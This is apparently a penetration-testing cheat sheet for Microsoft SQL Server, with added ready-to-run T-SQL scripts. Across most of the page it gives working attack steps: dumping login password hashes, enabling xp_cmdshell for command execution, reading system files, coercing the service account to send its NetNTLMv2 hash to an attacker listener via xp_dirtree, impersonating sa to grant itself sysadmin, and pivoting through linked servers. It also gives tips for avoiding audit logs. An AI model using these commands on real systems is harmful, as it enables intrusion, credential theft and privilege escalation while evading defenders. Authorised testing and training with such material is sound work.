MSSQL
ABOUT
Microsoft SQL Server (MSSQL) is Microsoft's relational database management system. It is popular with database administrators and developers building applications on Microsoft's .NET framework because of its strong native .NET support, and it exposes a broad attack surface: logins, stored procedures, linked servers and the service account itself. Default ports are TCP 1433 for the database engine and UDP 1434 for the SQL Server Browser service. More about MSSQL hacking: [LINK]
Authentication Modes
MSSQL has two authentication modes: Windows Authentication mode (the default) and Mixed mode. Windows Authentication mode is often called integrated authentication because logins are validated by Windows/Active Directory: if your Windows account, or a group you are a member of, has been granted a login, you are authenticated automatically without a database password. Mixed mode additionally supports SQL Server authentication, where the login and its password hash are stored in the instance itself. With the client tools below, specifying a domain (or impacket's -windows-auth flag) selects Windows authentication; leaving it out selects SQL authentication. Specify the account as DOMAIN\\accountname; for a local Windows account on the SQL host, use the server name or "." in place of the domain.
Databases
MSSQL has default system databases that can help us understand the structure of all the databases that may be hosted on a target server.
master
Tracks all system information for an SQL server instance
model
Template database that acts as a structure for every new database created. Any setting changed in the model database will be reflected in any new database created after changes to the model database
msdb
The SQL Server Agent uses this database to schedule jobs & alerts
tempdb
Stores temporary objects
resource
Read-only database containing system objects included with SQL server
MSSQL Useful Commands
HackTricks: [LINK]
impacket-mssqlclient carni17@13.13.13.13
Connect to the MSSQL server.
SELECT name FROM master.dbo.sysdatabases;
Show all databases
use <database>;
Select one of the existing databases
SELECT * FROM databasename.INFORMATION_SCHEMA.TABLES;
Show all available tables in the selected database
select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;
List server logins with type, status and (for SQL logins only; NULL for Windows logins) the password hash
select * from <table>;
Show everything in the desired table
xp_cmdshell 'whoami'
Disabled by default. System command execution via MSSQL, running as the SQL Server service account. A sysadmin can enable it with sp_configure ('show advanced options' first, then 'xp_cmdshell') followed by RECONFIGURE
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
Not available to ordinary logins. Reads a local file as one blob (column name BulkColumn); requires the ADMINISTER BULK OPERATIONS server permission, held by members of bulkadmin and sysadmin
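The following T-SQL is an added example, not code from the original page: it ties the Authentication Modes section to the "not default" commands above by checking the instance posture first (auth mode, own privileges, whether xp_cmdshell is already on, whether bulk reads are allowed) and only then enabling xp_cmdshell and reading a file. It assumes the current login is sysadmin; the file path is the one from the page.

```sql
-- Added example (not from the original page). Assumes the current login is sysadmin.

-- 1. Auth mode and who we are. IsIntegratedSecurityOnly: 1 = Windows-only, 0 = Mixed (SQL logins usable)
SELECT SERVERPROPERTY('IsIntegratedSecurityOnly') AS windows_auth_only,
       SERVERPROPERTY('ProductVersion')           AS version,
       SYSTEM_USER                                AS current_login,
       IS_SRVROLEMEMBER('sysadmin')               AS am_sysadmin;

-- 2. Is xp_cmdshell already enabled? value_in_use = 1 means yes (no need to touch the config)
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell', 'Ole Automation Procedures');

-- 3. Enable it (sysadmin only; the change is visible to defenders in the SQL error log)
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;           RECONFIGURE;

-- 4. Run a command and keep the output in a table so it can be filtered instead of scrolling
DECLARE @out TABLE (line NVARCHAR(4000));
INSERT INTO @out EXEC master..xp_cmdshell 'whoami /all';
SELECT line FROM @out WHERE line IS NOT NULL;

-- 5. File read. Check the server-level permission first (1 = allowed), then read the file.
SELECT HAS_PERMS_BY_NAME(NULL, NULL, 'ADMINISTER BULK OPERATIONS') AS can_bulk_read;
SELECT BulkColumn AS contents
FROM OPENROWSET(BULK N'C:\Windows\System32\drivers\etc\hosts', SINGLE_CLOB) AS f;
```

Run it as one batch (sqsh/sqlcmd: paste, then GO). Step 2 matters on real engagements: if xp_cmdshell is already 1, skip step 3 and avoid writing a config change to the log.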
CMD Interacting
Linux
sqsh -S 13.13.13.13 -U venator17 -P 'superkek' -h
# sqsh buffers input: write each statement on its own line and type GO on a line by itself to execute the batch
sqsh -S 13.13.13.13 -U MILITECH\\venator17 -P 'superkek' -h
# "." means the local machine: use .\\venator17 for a local Windows account on the SQL host when there is no domain
impacket-mssqlclient MILITECH/ADMINISTRATOR@13.13.13.13 -windows-auth
Windows
sqlcmd -S 13.13.13.13 -U venator17 -P superkek123
sqlcmd # If you are already on the host: with no -U/-P it connects to the default local instance using your Windows credentials
# Like sqsh, sqlcmd buffers input: one statement per line, then GO on its own line to execute the batch
ENUM
Nmap Scan
sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 13.13.13.13
Metasploit Scan
We can use mssql_ping to get more useful info about the MSSQL server.
msf6 auxiliary(scanner/mssql/mssql_ping) > set rhosts 13.13.13.13
rhosts => 13.13.13.13
msf6 auxiliary(scanner/mssql/mssql_ping) > run
[*] 13.13.13.13: - SQL Server information for 13.13.13.13:
[+] 13.13.13.13: - ServerName = SQL-01
[+] 13.13.13.13: - InstanceName = MSSQLSERVER
[+] 13.13.13.13: - IsClustered = No
[+] 13.13.13.13: - Version = 15.0.2000.5
[+] 13.13.13.13: - tcp = 1433
[+] 13.13.13.13: - np = \\SQL-01\pipe\sql\query
[*] 13.13.13.13: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
PowerUpSQL
PowerUpSQL [LINK] is a PowerShell toolkit for SQL Server discovery, enumeration and attack (privilege escalation, command execution, data hunting).
PS C:\> Import-Module .\PowerUpSQL.ps1
PS C:\> Get-SQLInstanceDomain
Login
PS C:\> Get-SQLQuery -Verbose -Instance "13.13.13.13,1433" -username "militech\sreed" -password "password123" -query 'Select @@version'
ATTACKS
Capture MSSQL Service Hash
EXEC master..xp_dirtree '\\13.13.13.13\amogus\'
OR
EXEC master..xp_subdirs '\\13.13.13.13\amogus\'
# The SQL Server service account authenticates to the UNC path over SMB. Run Responder or impacket-smbserver on 13.13.13.13 beforehand to act as the fake server and capture its NetNTLMv2 hash (crack with hashcat mode 5600 or relay it)
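An added T-SQL example (not from the original page) for the hash-capture step: before coercing the connection it checks which account runs the SQL Server service, because that is whose hash arrives at the listener, then triggers the SMB authentication with three different stored procedures. 13.13.13.13 is assumed to be the pentester's listener and the share name is arbitrary; the path does not need to exist.

```sql
-- Added example (not from the original page). Listener assumed at 13.13.13.13 (Responder / impacket-smbserver).

-- 1. Whose hash will we get? The service account makes the outbound SMB connection, not our login.
--    Needs VIEW SERVER STATE. A value like 'NT Service\MSSQLSERVER' means the *computer* account authenticates;
--    a domain user here (e.g. MILITECH\svc_sql) is the interesting case.
SELECT servicename, service_account, startup_type_desc
FROM sys.dm_server_services;

-- 2. Trigger the outbound authentication. Any one of these is enough; all need only a normal login.
EXEC master..xp_dirtree   '\\13.13.13.13\amogus\', 1, 1;   -- depth 1, include files
EXEC master..xp_subdirs   '\\13.13.13.13\amogus\';
EXEC master..xp_fileexist '\\13.13.13.13\amogus\x.txt';
```

If step 1 shows a machine account, the captured NetNTLMv2 is the computer account's and is not practically crackable, but it may still be relayable.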
Impersonating other users
Check what users can be impersonated
SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'
GO
Check current role and user
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
GO
Impersonating the sa user (run REVERT afterwards to return to the original login)
EXECUTE AS LOGIN = 'sa'
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
GO
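The following is an added T-SQL example, not code from the original page. It extends the impersonation check above by showing both sides of each IMPERSONATE grant (who holds it and who can be impersonated), then switches to sa, uses the elevated context to add the original login to sysadmin so impersonation is no longer needed, and reverts. It assumes the current login has IMPERSONATE on sa.

```sql
-- Added example (not from the original page). Assumes our login has IMPERSONATE on the 'sa' login.

-- 1. Map who can impersonate whom. For IMPERSONATE on a login the permission row has
--    class_desc = 'SERVER_PRINCIPAL' and major_id = the principal_id of the login being impersonated.
SELECT grantee.name    AS grantee_login,
       target.name     AS can_impersonate,
       target.type_desc AS target_type,
       p.state_desc
FROM sys.server_permissions p
JOIN sys.server_principals grantee ON grantee.principal_id = p.grantee_principal_id
JOIN sys.server_principals target  ON target.principal_id  = p.major_id
WHERE p.class_desc = 'SERVER_PRINCIPAL'
  AND p.permission_name = 'IMPERSONATE';

-- 2. Remember who we are, switch, verify.
DECLARE @me sysname = SYSTEM_USER;
SELECT @me AS login_before, IS_SRVROLEMEMBER('sysadmin') AS sysadmin_before;

EXECUTE AS LOGIN = 'sa';   -- errors with "Cannot execute as the server principal ..." if the grant is missing
SELECT SYSTEM_USER AS login_now, IS_SRVROLEMEMBER('sysadmin') AS sysadmin_now;

-- 3. While we are sa, make the original login sysadmin so later sessions do not depend on impersonation.
IF IS_SRVROLEMEMBER('sysadmin') = 1
    EXEC('ALTER SERVER ROLE sysadmin ADD MEMBER ' + QUOTENAME(@me));

-- 4. Impersonation stacks per session; REVERT pops one level.
REVERT;
SELECT SYSTEM_USER AS login_after, IS_SRVROLEMEMBER('sysadmin') AS sysadmin_after;
```

Step 3 is loud (role membership changes are easy to audit); on a stealthier engagement do the privileged work inside the impersonated context instead and just REVERT.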
Check linked servers
Identify linked servers
SELECT srvname, isremote FROM sysservers
GO
This returns a server list: isremote = 1 marks a remote server (legacy remote-login setup), isremote = 0 marks a linked server. sysservers is a compatibility view; sys.servers is the current one and also shows whether RPC Out is enabled, which EXECUTE ... AT requires.
Check rights
EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [13.13.13.13\LINKEDSERVER]
GO
Execute commands at linked server
EXECUTE('') AT [13.13.13.13\LINKEDSERVER]
GO
If the command contains quotes, use doubled single quotes for them (''example''); each additional level of nesting doubles them again.
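An added T-SQL example, not from the original page, that carries the linked-server procedure through end to end: enumerate links with sys.servers (including the RPC Out flag EXECUTE ... AT depends on) and their login mappings, check what the link maps us to on the far side, enable xp_cmdshell there, and hop a second link with the quote doubling explained above. The link names SQL-02 and SQL-03 are placeholders.

```sql
-- Added example (not from the original page). [SQL-02] and [SQL-03] are placeholder linked-server names.

-- 1. Links and the flags that matter. server_id 0 is the local server; EXECUTE ... AT needs is_rpc_out_enabled = 1.
SELECT server_id, name, product, provider, data_source,
       is_linked, is_rpc_out_enabled, is_data_access_enabled
FROM sys.servers
WHERE server_id <> 0;

-- 2. How does the link authenticate? uses_self_credential = 1 means our own login is passed through;
--    a fixed remote_name (often a privileged SQL login) is the classic escalation path.
SELECT s.name AS link, ll.local_principal_id, ll.uses_self_credential, ll.remote_name
FROM sys.linked_logins ll
JOIN sys.servers s ON s.server_id = ll.server_id;

-- 3. Who are we on the other side, and are we sysadmin there?
EXECUTE('SELECT @@servername, @@version, SYSTEM_USER, IS_SRVROLEMEMBER(''sysadmin'')') AT [SQL-02];

-- 4. If sysadmin there: enable xp_cmdshell on the remote instance and run a command.
EXECUTE('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [SQL-02];
EXECUTE('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;')           AT [SQL-02];
EXECUTE('EXEC master..xp_cmdshell ''whoami''')                           AT [SQL-02];

-- 5. Links can be chained. One level of nesting: quotes inside the inner string are doubled twice.
EXECUTE('SELECT name FROM sys.servers WHERE server_id <> 0') AT [SQL-02];
EXECUTE('EXECUTE(''SELECT @@servername, SYSTEM_USER, IS_SRVROLEMEMBER(''''sysadmin'''')'') AT [SQL-03]') AT [SQL-02];
```

If step 3 fails with an error about RPC being disabled, the link exists but cannot execute batches; OPENQUERY([SQL-02], '...') still works for read-only SELECTs.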